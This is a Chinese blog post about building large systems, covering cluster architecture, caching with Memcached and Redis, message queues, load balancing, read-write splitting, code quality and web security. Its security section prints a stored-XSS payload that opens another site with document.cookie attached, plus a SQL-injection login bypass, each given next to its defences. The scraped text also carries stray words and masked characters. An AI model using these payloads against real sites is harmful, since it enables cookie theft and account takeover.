開發人員學Linux之終結篇:大型系統開發經驗談

1、前言
php


這篇文章來源於個人一個 PPT,而這個 PPT 是源於一個朋友的一次邀請,朋友邀請我爲一個公司作一堂大約 2 小時的技術講座,我選定的方向是《如何開發一個大型系統nginx


在這裏我對大型系統的定義爲:日均 PV 在千萬級以上,而京東和淘寶這類則屬於巨型系統了。sql


所以在本篇中講述的都是基於一些開源免費的技術實現,至於那些經過 F5 硬件加速、DNS 來實現負載均衡、CDN 加速等須要花錢購買的技術或者服務則再也不本篇介紹範圍之類。數據庫


原本此篇是做爲《開發人員學Linux》系列的終結篇最後出現的,可是考慮到在此過程當中我可能會因爲時間和精力緣由沒法所有完成或者因爲關注點在別的方向而沒法終結,因此提早把這篇先寫了。編程


2、從兩個系統提及
瀏覽器


2.1 某移動互聯網公司服務器端架構圖緩存


wKioL1lLKxryNpbSAALmcwD0HLo188.png-wh_50


上圖是某移動互聯網公司的服務器端架構圖,它支撐了國內外數百萬客戶端的訪問請求,它有以下特色:安全


一、多層級集羣,從Web服務器層、NoSQL層級數據庫層都實現了集羣,這樣使得每一層的響應時間大大縮短,從而可以在單位時間內響應更多請求;服務器


二、NoSQL應用(Memcached),在NoSQL領域Memcached和Redis都有大量的用戶羣,在這個架構裏使用的是Memcached。微信


三、數據庫讀寫分離,當前大多數數據庫服務器支持主從機制或訂閱發佈機制,這樣一來就爲讀寫分離創造了條件,減小了數據庫競爭死鎖出發條件,使響應時間大爲縮短(非數據庫集羣狀況下還能夠考慮分庫機制)。


四、負載均衡,Nginx實現Web服務器的負載均衡,Memcached自帶負載均衡實現。(注:Nginx負載均衡在本系列應涉及,感興趣請移步觀看)。


2.2 某公司生產管理系統架構圖


wKiom1lLKy2BWHGQAARYFiX2MiM778.png-wh_50 


上圖是爲某公司的一個分散型系統作的架構設計,這家公司擁有多個跨市、跨省的生產片區,在各片區都有本身的生態車間,各片區與總公司之間經過數據鏈路鏈接。


這個系統的特色是全部的流水線上的產品都貼有惟一的條碼,在生產線的某個操做位操做以前都會掃描貼在產品上的條碼,系統會根據條碼作一些檢查工做,如:產品條碼是否應被使用過(好比以前應發貨給客戶過)、產品是否完成了本道工序以前的所有必須完成工序,若是知足條件則記錄當前操做工序名稱、操做人、操做時間和操做結果等。


一件產品從上線到完成有數十道工序,而每個月下線的產品有少則數十萬、多則數百萬,一個月下來的數據量也是不小的。特別是在跨廠區網絡不穩定的狀況下如何保證對生產的影響最小。


本系統架構特色:


● 全部業務邏輯集中在服務器端,並以 Service 形式提供,這樣便於業務邏輯調整客戶端能及時獲得最新更新;


部署 Service 的服務器採用集羣部署,Nginx 實現調度;


NoSQL 採用了 Redis,與 Memcached 相比,Redis 支持的數據類型更多,同時 Redis 帶有持久化功能,能夠將每一個條碼對應的產品的最終信息存儲在 Redis 當中,這樣通常的查詢工做(如條碼是否被使用、產品當前狀態)均可以在Redis中查詢而不是數據庫查詢,這樣大大減輕了數據庫壓力;


數據庫採用了主從機制,實現了讀寫分離,也是爲了提升響應速度;


使用了消息隊列 MQ和 ETL,將一些能夠異步處理的動做存放在 MQ 中,而後由 ETL 來執行(好比訂單完成後以郵件形式通知相關人員);


實現了系統監控,經過 Zabbix 來對服務器、應用及網絡關鍵設備實行 7×24 小時監控,重大異常及時郵件通知IT支持人員。


因爲總部其它地方生產規模較小,因此生產分佈未採用複雜架構,不過由於從客戶處退回的不良產品都會在總部生產車間進行返修處理,所以總部生產系統須要保存分部生產車間數據,所以分部生產車間數據會同時寫進分部生產數據庫和分部 MQ 服務器,而後由總部 ETL 服務器讀取寫入到總部系統中。


在分部與總部網絡中斷的狀況下分部系統仍可獨立工做,直到網絡恢復。


3、系統質量保證


3.1單元測試


wKiom1lLK0GC_GejAAId0Qq-Wi8396.png-wh_50 


單元測試是指對軟件中的最小可測試單元進行檢查和驗證。一般而言,一個單元測試是用於判斷某個特定條件(或者場景)下某個特定函數的行爲,常見的開發語言都有對應的單元測試框架,常見的單元測試工具:

Junit/Nunit/xUnit.Net/Microsoft.VisualStudio.TestTool


關於單元測試的重要性和如何編寫單元測試用例,在本篇就不詳述了,網上有大量相關的文章。總之,越大型的系統、越重要的系統,單元測試的重要性越大。


針對一些須要外部依賴的單元測試,好比須要 Web 容器等,可使用 mock 測試,Java 測試人員可使用EasyMock這個測試框架,其網址是:http://easymock.org/


3.2 代碼質量管理平臺


對於多人蔘與的團隊項目,雖然大多數狀況下會有編碼規範拉指導你們如何編寫團隊風格一致的編碼,可是不能保證團隊中每一個成員、尤爲是後期加入的團隊成員仍能按照編碼規範來編寫代碼,所以須要有一個平臺來保證,在這裏推薦 SonarQube。


SonarQube 是一個開源平臺,用於管理源代碼的質量。Sonar 不僅是一個質量數據報告工具,更是代碼質量管理平臺。支持的語言包括:Java、PHP、C#、C、Cobol、PL/SQL、Flex 等。主要特色:


代碼覆蓋:經過單元測試,將會顯示哪行代碼被選中

改善編碼規則

搜尋編碼規則:按照名字,插件,激活級別和類別進行查詢

項目搜尋:按照項目的名字進行查詢

對比數據:比較同一張表中的任何測量的趨勢


wKiom1lLK1PQAi0HAAMNrEX1KA0428.png-wh_50 


固然除了代碼質量管理平臺外,還有藉助源代碼管理系統,而且在每次提交代碼前進行代碼審覈,這樣每次代碼的異動均可以追溯出來。


我管理和經歷過的一些重要系統中採用過這樣的作法:除了管理全部程序代碼以外,還將系統中數據庫中的表、視圖、函數及存儲過程的建立都使用源代碼版本管理工具管控起來,並且粒度很小,每一個對象的建立都是一個 SQL 文件。


這種方式雖然操做起來有些瑣碎,但對於代碼的變遷追溯很是方便。


4、系統性能保證


4.1 緩存


所謂緩存就是將一些頻繁使用、但改動相對不平凡的數據保存在內存中,每次更新這些數據的時候同時持久化到數據庫或文件系統,並同時更新到緩存中,查詢的時候儘量利用緩存。


緩存的實現方法:自定義實現或利用NoSQL。


自定義實現:自定義實現可利用SDK中提供的類,如Dictionary等。

優勢:能夠局部提升查詢效率;

缺點:不能跨應用、跨服務器,僅限於單個應用;沒有較好緩存生命週期管理策略。


NoSQL

Memcached

優勢:能夠跨應用、跨服務器,有靈活的生命週期管理策略;支持高併發;支持分佈式。

缺點:不支持持久化,僅在內存存儲,重啓後數據丟失,須要「熱加載」;僅支持Key/Value.


Redis

優勢:能夠跨應用、跨服務器,有靈活的生命週期管理策略;支持高併發;支持集羣;支持持久化;支持Key/Value、List、Set、Hash數據結構;


以上幾種方法都存在一個特色:須要經過Key去尋找對應的Value、List、Set或Hash。


除了Memcached和Redis以外,還出現了一些NoSQL數據庫和支持NoSQL的數據庫,前者如MongoDB,後者如PostgreSQL(>V9.4),下面是一個MongoDB與PostgreSQL的NoSQL特性的對比:


wKiom1lLK2mzQB44AADUm1sIwx4393.png-wh_50


文檔型 NoSQL 數據庫的特色:


(1)不定義表結構

     即便不定義表結構,也能夠像定義了表結構同樣使用,還省去了變動表結構的麻煩。


(2)可使用複雜的查詢條件

     跟鍵值存儲不一樣的是,面向文檔的數據庫能夠經過複雜的查詢條件來獲取數據,雖然不具有事務處理和Join這些關係型數據庫所具備的處理能力,但初次之外的其餘處理基本上都能實現。


nosql 主要是提升效率,關係數據庫能夠保證數據安全;各有使用場景,通常的企業管理系統,沒多少併發量不必使用 nosql,互聯網項目或要求併發的 nosql 使用比較多,可是最終重要的數據仍是要保存到關係數據庫。


這也是爲何不少公司會同時使用 NoSQL 和關係型數據庫的緣由。


4.2 異步


所謂異步就是調用一個方法後並不等該方法執行完畢後再繼續執行後續的操做,而是調用完畢後立刻等待用戶的其它指令。


打印機管理程序就是一個異步的例子,某我的可能有幾個數百頁的文檔須要打印,能夠在打開一個文檔以後點擊打印,而後繼續打開另外一個文檔繼續點打印。儘管打印數百頁文檔須要較長時間,但後續的打印請求會在打印管理程序中排隊,等第一個文檔打印完成後再繼續第二個文檔的打印。


異步有兩個層面:編程語言層面的異步和經過消息隊列等機制實現的異步。


語法層面異步:像Java/C#等大多數語言都支持異步處理


消息隊列實現異步

用消息隊列實現異步只是消息隊列的一個基本功能之一,消息隊列還具備以下功能:

解耦

靈活性 & 峯值處理能力

可恢復性

送達保證

排序保證

緩衝

理解數據流

異步通訊


注:消息隊列成爲在進程或應用之間進行通訊的最好形式。消息隊列隊列是建立強大的分佈式應用的關鍵。


經常使用消息隊列有以下,可根據系統特色和運維支持團隊的掌握程度選擇:


MSMQ

ActiveMQ

RabbitMQ

ZeroMQ

Kafka

MetaMQ

RocketMQ


4.3負載均衡


負載均衡是根據某種負載策略把請求分發到集羣中的每一臺服務器上,讓整個服務器羣來處理網站的請求。


常見負載均衡方案


Windows負載均衡:NLB

Linux負載均衡:LVS

Web負載均衡:Nginx

硬件級負載均衡:F5


wKiom1lLK4nxVnVxAAHz9zgVXpA891.png-wh_50

wKiom1lLK4qAWS2bAADAcvXCcvk874.png-wh_50wKioL1lLK4qjyVF8AADooLyuKcI632.png-wh_50


前面幾種都是免費的解決方案,F5 做爲一種硬件及解決方案在通常企業不多用到。我目前知道的僅有一家世界級飲料公司使用了 F5 做爲負載均衡解決方案,由於這個方案聽說至關昂貴。


4.4 讀寫分離


讀寫分離爲了確保數據庫產品的穩定性,不少數據庫擁有雙機熱備功能。


也就是,第一臺數據庫服務器,是對外提供增刪改業務的生產服務器;第二臺數據庫服務器,主要進行讀的操做。


原理:

讓主數據庫(master)處理事務性增、改、刪操做(INSERT、UPDATE、DELETE),而從數據庫(slave)處理SELECT查詢操做。


通常狀況下咱們是在代碼中進行處理,但目前也有很多商業中間件形式的讀寫分離中間件,能自動將讀寫數據庫操做調度到不一樣數據庫上。


wKioL1lLK6GDWtb4AAL4es19W8g411.png-wh_50


在大型系統中,有時候主、從數據庫都是一個集羣,這樣能夠保證響應速度更快,同時集羣中單臺服務器故障也不影響整個系統對外的響應。


5、系統安全性保證


5.1XSS***


防範XSS***
XSS***相似於SQL注入***,***以前,咱們先找到一個存在XSS漏洞的網站,XSS漏洞分爲兩種,一種是DOM Based XSS漏洞,另外一種是Stored XSS漏洞。理論上,全部可輸入的地方沒有對輸入數據進行處理的話,都會存在XSS漏洞,漏洞的危害取決於***代碼的威力,***代碼也不侷限於script。


DOM Based XSS
DOM Based XSS是一種基於網頁DOM結構的***,該***特色是中招的人是少數人。


Stored XSS
Stored XSS是存儲式XSS漏洞,因爲其***代碼已經存儲到服務器上或者數據庫中,因此受害者是不少人。假若有兩個頁面,一個負責提交內容,一個負責將提交的內容(論壇發帖、讀帖就是這種形式的典型):
提交內容:<script>window.open(「www.b.com?param=」+document.cookie)</script>
頁面內容:<%=request.getParameter("content")%>


這樣用戶在a站提交的東西,在顯示的時候若是不加以處理就會打開b站頁面將相關敏感內容顯示出來。
針對XSS***的防範辦法:
Html encode
特殊字符過濾:<,>

5.2 SQL注入


SQL Injection

所謂SQL注入式***,就是***者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。


在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或做爲存儲過程的輸入參數,這類表單特別容易受到SQL注入式***。


例如咱們在登陸一個系統時,在軟件底層按照以下方式查詢數據:
登陸SQL語句: SELECT COUNT(*) FROM Login WHERE UserName='admin' AND Password='123456‘
SELECT COUNT(*) FROM Login
WHERE UserName='admin'–
Password='123'


wKioL1lLK7eCTMy8AAEiIoumVvQ130.png-wh_50


針對SQL注入防範辦法:
數據輸入驗證
特殊字符過濾:特殊字符過濾
參數化SQL語句(包括存儲過程)
不使用sa級別帳戶做爲鏈接帳戶或限制鏈接IP


防範辦法:
Html encode
特殊字符過濾:<,>
 
5.3 CSRF***


CSRF(Cross-site request forgery)跨站請求僞造,也被稱爲「One Click Attack」或者Session Riding,一般縮寫爲CSRF或者XSRF,是一種對網站的惡意利用。


儘管聽起來像跨站腳本(XSS),但它與XSS很是不一樣,而且***方式幾乎相左。XSS利用站點內的信任用戶,而CSRF則經過假裝來自受信任用戶的請求來利用受信任的網站。


與XSS***相比,CSRF***每每不大流行(所以對其進行防範的資源也至關稀少)和難以防範,因此被認爲比XSS更具危險性。


其核心策略是利用了瀏覽器Cookie或者服務器Session策略,盜取用戶身份。


針對CSRF***防範辦法:
表單Token
驗證碼
Referer檢查
關鍵操做身份確認

5.4 其它***


Error Code:即錯誤代碼回顯,許多Web服務器爲調試方便默認顯示詳盡錯誤信息,如錯誤發生的上下文、服務器及應用信息等,容易被惡意利用。


系統或者框架漏洞:如IIS6.0如下版本存在「JPG漏洞」;Apache Struts2服務在開啓動態方法調用任意方法漏洞(CVE-2016-3081);OpenSSL的heartbeat漏洞(CVE-2014-0160);Apache解析漏洞;Nginx(<V0.8.37)空字節代碼執行漏洞;IIS7.0及Nginx(<V0.8.37)畸形解析漏洞;文件上傳漏洞;路徑遍歷漏洞;


防範辦法:
上傳文件時對MIME進行檢查,必要狀況下對上傳文件改名
及時關注安全網站及產品官方網站,發現漏洞及時打補丁
對Web Server運用的用戶角色權限進行限制
使用漏洞掃描工具模擬***


下面是一些我見過的被***後的系統截圖,以下圖是CCTV音樂頻道2008年被***的截圖:


wKioL1lLLCXATG7ZAACOl1_EaHE577.jpg-wh_50 


還有本人2008年先後搭建PHPWind運行的畫面:


wKiom1lLLDSwhKNbAAHHaegynWs261.png-wh_50 


上圖中是本人2006年先後搭建的一個論壇,有人利用系統漏洞註冊了不少用戶名爲空的用戶(實際上是身份遺失),,而後又利用這些帳戶在論壇中大量發佈廣告、×××等違法違紀的帖子,由於使用了一些不可見字符進行註冊的,在後臺沒法管理,最後只好在數據庫中操做管理了。


6、開發相關的經驗教訓

6.1應用日誌記錄


之前團隊運維着一個老系統,系統中沒有日誌功能,而系統的操做人員的計算機水平又較低,每次打電話都是說系統不能用或者是一些根本沒法快速定位緣由的描述,每次接到求助後須要花費大量時間來分析定位緣由,後來將系統中增長了日誌功能,而且在網絡狀態連通狀況下可自動將錯誤日誌以郵件形式發送到負責同事組成的用戶組,自此之後處理這類問題的響應時間大大縮短了,雙方都很滿意。


如今已經有不少開源日誌庫,好比.NET的Log4Net,Java的Log4j,能夠很輕鬆地配置啓用日誌功能。利用日誌組件能夠將信息記錄到文件或數據庫,便於發現問題時根據上下文環境發現問題,這一點在調試多線程時尤爲重要。


日誌級別:FATAL(致命錯誤)、ERROR(通常錯誤)、WARN(警告)、INFO(通常信息)、DEBUG(調試信息)。

注意:在調試環境中時日誌級別儘可能低(warn/info),在生產環境中日誌級別儘可能高(error),且對日誌文件大小必定要進行控制。否則也會產生問題。

案例:某國內有名的管業集團公司的一個系統的重要模塊發生問題,啓用了日誌功能以便經過日誌組件快速將問題定位並修復。


在發佈到生產環境時,運行一段時間以後發現程序運行效率至關低下,多位開發人員對模塊代碼進行性能分析未發現問題,你們發現一樣的數據量和操做在生產環境和開發環境效率差巨大,無心中發現生產服務器上日誌文件已超過5G!過後發現是因爲疏忽未調高日誌級別且未對日誌進行控制,調整日誌模式爲按日記錄,問題解除。


6.2歷史記錄追蹤


代碼管控:

儘量使用代碼管控工具對源代碼進行管控,如SVN/TFS/Git,若是有可能不但管控程序代碼,還要管控數據庫相關的SQL文件(包括初始化腳本及存儲過程和使用ORM框架中的Mapping文件),作到系統的一切變更皆有記錄。

代碼審覈:
任何人提交代碼都必須本人本地編譯、調試無誤後,再有人review後方可提交,且針對bug修復的提交需註明所修復的bug信息。

Bug記錄:
經過Bug記錄系統記錄整個bug的生命週期,包括髮現、修復、關閉。TFS自己支持bug記錄,開源系統中禪道也是一個不錯的Bug記錄工具。


七.總結

本篇主要是就係統從開發到最終部署運維過程當中經常使用的技術、框架和方法作了一個總結,固然以上經驗總結來源本人從業以來所經歷的項目中的經驗和教訓,可能還有更好更完美的方案,在此權當拋磚引玉罷了。


聲明:本文首發於本人我的微信訂閱號:zhoujinqiaoIT,其後會同時在本人的CSDN、51CTO及oschina三處博客發佈,本人會負責在此四處答疑。

相關文章
相關標籤/搜索